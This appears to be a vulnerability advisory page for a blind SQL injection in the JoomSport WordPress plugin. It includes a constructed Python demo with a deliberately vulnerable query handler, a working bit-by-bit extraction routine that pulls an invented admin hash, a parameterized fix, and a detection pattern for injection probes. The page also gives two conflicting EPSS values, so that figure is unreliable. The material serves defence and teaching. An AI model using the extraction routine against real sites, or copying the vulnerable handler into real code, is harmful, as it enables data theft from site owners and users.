Cyber Resilience

CVE-2026-42647

Severity: Critical
Published: 11 June 2026
Modified: 17 June 2026
CISA KEV: not listed
CVSS v3.1: 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L)
EPSS: 0.0132 (67.4th percentile)
Risk Priority: 70 (floored blend, peak EPSS)

Summary

CVE-2026-42647 is a critical-severity SQL injection (CWE-89) vulnerability in the Beardev JoomSport WordPress plugin. Its CVSS v3.1 base score is 9.3 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its EPSS percentile (67.4th) ranks it in the top 32.6% of CVEs by exploit likelihood, and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-42647 is a blind SQL injection vulnerability (CWE-89) in the Beardev JoomSport WordPress plugin, caused by improper neutralization of special elements used in an SQL command. The flaw affects all versions up to and including 5.7.7 and carries a CVSS v3.1 base score of 9.3, reflecting a network attack vector, low attack complexity, no required privileges or user interaction, changed scope, high confidentiality impact, no integrity impact and low availability impact.

An unauthenticated remote attacker can supply crafted input to trigger the injection. Because the injection is blind, no query output is returned directly; the attacker instead infers database contents from differences in the application's response (a true/false change in the page, or a timing difference), which allows sensitive data to be extracted one bit at a time while also producing limited availability effects. The flaw is exploitable directly over the network against any reachable site running an affected version of the plugin.

The primary public reference is the Patchstack advisory entry for the JoomSport plugin, which documents the SQL injection issue in versions through 5.7.7. The available references give no patch or mitigation details beyond the advisory itself, so a fixed version should not be assumed from this page.

EPSS remains flat at 0.0518 with no material increase from its initial value.

Vulnerability details

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Beardev JoomSport allows Blind SQL Injection. This issue affects JoomSport: from n/a through 5.7.7.

CWE(s)

CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Direct, unauthenticated network exploitation of a public-facing WordPress plugin via blind SQL injection to extract database contents.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

Affected Assets

Beardev JoomSport WordPress plugin, all versions through 5.7.7.

Mitigating Controls (NIST 800-53 r5)

SI-10 Information Input Validation (prevent)

Directly requires validation of all inputs to block crafted SQL syntax that enables the blind injection described in CVE-2026-42647.

SI-2 Flaw Remediation (prevent)

Mandates timely remediation of the known SQL injection flaw in JoomSport versions through 5.7.7 before exploitation occurs.

Monitoring (detect)

Enables monitoring of database or application traffic to identify anomalous queries indicative of blind SQL injection attempts.
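The injection pattern described in the Deeper analysis and the SI-10 input-validation and detect controls above, as an added example: this is not JoomSport's code and not taken from the Patchstack advisory. It is a constructed Python/sqlite3 stand-in for a PHP/MySQL plugin handler, with a hypothetical `teams` lookup table, an invented `wp_users` row and hash fragment, and invented function names. It shows the vulnerable string concatenation, the boolean-based blind extraction it permits (seven requests per character), the parameterized replacement with a type check in front of it (the `?` placeholder plays the role of `$wpdb->prepare()` placeholders in WordPress), and a query-log check of the kind a database or WAF monitor would run.

```python
import re
import sqlite3

# Constructed demo schema standing in for a plugin lookup table plus the
# WordPress users table. It is NOT JoomSport's schema; the table names, the
# admin row and the hash fragment are invented for this example.
SCHEMA = """
CREATE TABLE teams (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO teams VALUES (1, 'Lions'), (2, 'Tigers');
INSERT INTO wp_users VALUES (1, 'admin', '$P$Bx7demo');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def team_exists_vulnerable(conn, team_id, log):
    """CWE-89: the request parameter is concatenated straight into the SQL text.
    The caller only learns whether a row came back, which is all a blind
    (boolean-based) injection needs."""
    sql = f"SELECT id FROM teams WHERE id = {team_id}"
    log.append(sql)
    return conn.execute(sql).fetchone() is not None


def team_exists_hardened(conn, team_id, log):
    """SI-10 style fix: reject anything that is not a decimal integer literal,
    then bind the value as a query parameter so it can never become SQL syntax."""
    if not re.fullmatch(r"\d{1,10}", str(team_id)):
        raise ValueError("team_id must be a decimal integer")
    sql = "SELECT id FROM teams WHERE id = ?"
    log.append(sql)
    return conn.execute(sql, (int(team_id),)).fetchone() is not None


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction. `oracle(payload)` returns True when the
    injected condition holds. Each character is recovered with a binary search
    over its code point (0..127), i.e. 7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # coalesce(...,0): a position past the end of the string compares
            # as 0, which the search reads as "no more characters".
            cond = (f"1 AND coalesce(unicode(substr(({subquery}),{pos},1)),0)"
                    f" > {mid}")
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


# Query shapes a database-side or WAF log monitor can key on for blind SQLi:
# character probing (substr/unicode/ascii), tautologies (AND 1=1), time delays.
SUSPECT_SQL = re.compile(
    r"\b(substr|substring|unicode|ascii|sleep|benchmark|pg_sleep)\s*\(|"
    r"\b(and|or)\s+\d+\s*=\s*\d+|"
    r"\bwaitfor\s+delay\b",
    re.IGNORECASE,
)


def flag_suspicious(queries):
    """Return the logged statements that match blind-injection probe patterns."""
    return [q for q in queries if SUSPECT_SQL.search(q)]


def run_demo():
    conn = make_db()
    log = []
    # Attacker side: the vulnerable handler is the oracle; pull the admin hash.
    secret = blind_extract(
        lambda payload: team_exists_vulnerable(conn, payload, log),
        "SELECT user_pass FROM wp_users WHERE user_login = 'admin'",
    )
    # Legitimate traffic through both handlers, for contrast in the log.
    team_exists_vulnerable(conn, "2", log)
    team_exists_hardened(conn, "2", log)
    # The same kind of payload against the hardened handler never reaches SQL.
    try:
        team_exists_hardened(conn, "1 AND 1=1", log)
        blocked = False
    except ValueError:
        blocked = True
    flagged = flag_suspicious(log)
    return {"secret": secret, "blocked": blocked,
            "queries": len(log), "flagged": len(flagged)}


if __name__ == "__main__":
    print(run_demo())
```

Running `run_demo()` recovers the constructed ten-character hash through 77 yes/no requests (7 per character plus 7 to detect the end of the string), every one of which the log check flags, while the two legitimate lookups pass unflagged and the hardened handler rejects the injected value before any query is built. The allow-list check in front of the parameter binding is deliberate: binding alone stops the injection, but rejecting malformed input at the edge also gives the detect control a cheap, low-noise signal to alert on.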

References

Patchstack advisory entry for the Beardev JoomSport WordPress plugin (SQL injection, versions through 5.7.7).